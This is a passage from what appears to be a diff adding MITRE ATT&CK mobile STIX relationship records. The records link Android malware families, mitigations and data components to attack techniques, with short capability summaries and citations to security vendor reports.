applications or anomalies.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--52649ab6-8d1c-41d0-9804-3fd4b6a1ba48", + "created": "2023-03-16T18:37:55.715Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:37:55.715Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--290c9d3f-f59b-4e2b-9b7b-115014845c15", + "type": "relationship", + "created": "2021-09-24T14:47:34.447Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-04T20:08:48.439Z", + "description": "Device attestation can often detect rooted devices.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--476e269e-3c49-4fda-a54b-3f0cb577c5af", + "created": "2020-12-14T14:52:03.322Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:52:58.974Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can collect the device’s contact list.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6de29595-e63e-4d7e-992f-b4622b7b8e23", + "type": "relationship", + "created": "2020-09-11T14:54:16.566Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.566Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect device metadata and can check if the device is rooted.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb2a14c1-bed9-4c3f-a60b-8df384c18b68", + "type": "relationship", + "created": "2020-12-24T21:45:56.979Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T14:29:46.650Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can retrieve files from external storage and can collect browser data.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ba02a1dc-d5b9-41cb-9adf-883119e1aa51", + "created": "2020-12-14T14:52:03.359Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:12:27.624Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has communicated with the C2 using HTTP.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea", + "created": "2023-02-06T19:45:58.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:08:45.192Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use the open-source project RetroFit for C2 communication.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a255d63-a770-4b9d-911c-bd906733ceef", + "created": "2023-01-18T19:24:36.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:05:42.846Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) has C2 commands that can move the malware in and out of the foreground. (Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--67db22d4-6f89-40c6-b31b-737c1e3dec3f", + "created": "2021-01-20T16:01:19.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Anubis", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021.", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:17:07.374Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) has used motion sensor data to attempt to determine if it is running in an emulator.(Citation: Trend Micro Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0efe4125-504f-4eea-b19f-a44c81ee31dd", + "created": "2021-01-05T20:16:20.488Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can launch a fake Facebook login page.(Citation: Zscaler TikTok Spyware)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e78b2cd9-ef73-45d9-9477-e2e95454e208", + "type": "relationship", + "created": "2020-07-20T13:27:33.546Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.537Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can receive system notifications.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8f52e1ab-284e-4d0c-bae1-3a8544a22f57", + "created": "2020-11-24T17:55:12.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:22:41.797Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can wipe the device.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9b56528f-cf04-4d81-80ee-7bacb862383a", + "created": "2023-03-20T18:57:33.693Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:33.693Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3ca284e7-062c-4f23-b95d-9f9c6a2d882a", + "created": "2019-07-16T14:33:12.175Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Triada March 2016", + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:35.330Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) variants capture transaction data from SMS-based in-app purchases.(Citation: Kaspersky Triada March 2016) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f7b7de2-10e8-4eec-9c8f-db44ac3f271b", + "created": "2020-04-08T15:51:25.128Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:29:36.827Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can collect SMS messages.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--833b4c44-7370-4b27-b9b2-a058c27dcf8c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:28:32.568Z", + "description": "[Xbot](https://attack.mitre.org/software/S0298) steals all SMS message and contact information as well as intercepts and parses certain SMS messages.(Citation: PaloAlto-Xbot)", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--44a673c9-7ce7-42a0-8ab4-60bbb5001ce2", + "created": "2023-03-20T18:53:15.929Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:15.929Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--94bf07c4-3bf0-4ecc-8043-644e59fb9ec4", + "created": "2022-03-28T19:30:27.364Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates may contain patches to integrity checking mechanisms that can detect unauthorized hardware modifications.", + "modified": "2022-03-28T19:30:27.364Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7b45e72f-5741-4942-aa28-ee7abb6f7046", + "created": "2022-04-05T17:14:35.469Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:14:35.469Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--740ea19e-d248-44e5-a0e5-3e9420df9dc8", + "type": "relationship", + "created": "2020-04-24T17:46:31.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.613Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can inject input to set itself as the default SMS handler, and to automatically click through pop-ups without giving the user any time to react.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ddca1254-b404-4850-9566-0be35c6d7564", + "created": "2020-11-10T17:08:35.771Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:00:11.412Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can access the device’s SMS and MMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4ab1867c-b924-4b0d-a332-c0e150a28d7d", + "created": "2023-03-16T18:28:40.419Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:28:40.419Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc", + "created": "2021-10-01T14:42:49.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:41.762Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can abuse existing root access to copy components into the system partition.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9fa03a70-ad00-4148-ae5e-8315f3e618d2", + "created": "2020-07-15T20:20:59.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:29:29.307Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can abuse device administrator permissions to ensure that it cannot be uninstalled until its permissions are revoked.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5a277966-4559-487e-bdfb-7be6366ccdb6", + "type": "relationship", + "created": "2019-09-03T19:45:48.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.114Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can take pictures with the device cameras.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cda58372-ae70-4716-8baf-cc06cb884ad6", + "type": "relationship", + "created": "2020-12-24T22:04:28.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.015Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected a list of installed application names.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9d4c1d68-3cc8-4cf9-b3ee-1525d0ce32de", + "type": "relationship", + "created": "2019-10-14T20:49:24.571Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-10-14T20:49:24.571Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) collects information about running processes.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a63bafb6-6647-410f-8673-a53ef2dee5e2", + "created": "2020-07-27T14:14:57.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + 